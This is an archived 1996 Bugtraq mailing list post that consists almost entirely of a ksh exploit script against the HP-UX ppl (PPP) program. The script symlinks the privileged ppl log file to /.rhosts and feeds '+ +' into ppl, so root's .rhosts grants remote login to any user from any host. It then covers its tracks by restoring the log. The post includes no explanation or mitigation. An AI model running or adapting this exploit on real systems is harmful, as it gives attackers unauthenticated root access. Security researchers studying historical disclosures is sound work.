Bugtraq mailing list archives

HPUX PPP Bug - bugger.ppl


From: aleph1 () DFW NET (Aleph One)
Date: Sat, 12 Oct 1996 12:38:44 -0700


#!/bin/ksh

# need update for 10.X
# 10.X =/var/ppl/log

VER=`uname -r | cut -f2 -d.`
if [ "${VER}" = "10" ]
then
        LOG=/var/ppl/log
else
        LOG=/usr/spool/ppl/log
fi

mv $LOG $LOG.old
ln -s /.rhosts $LOG
ppl -o '\
+ +
'
rm $LOG
mv $LOG.old $LOG



Current thread: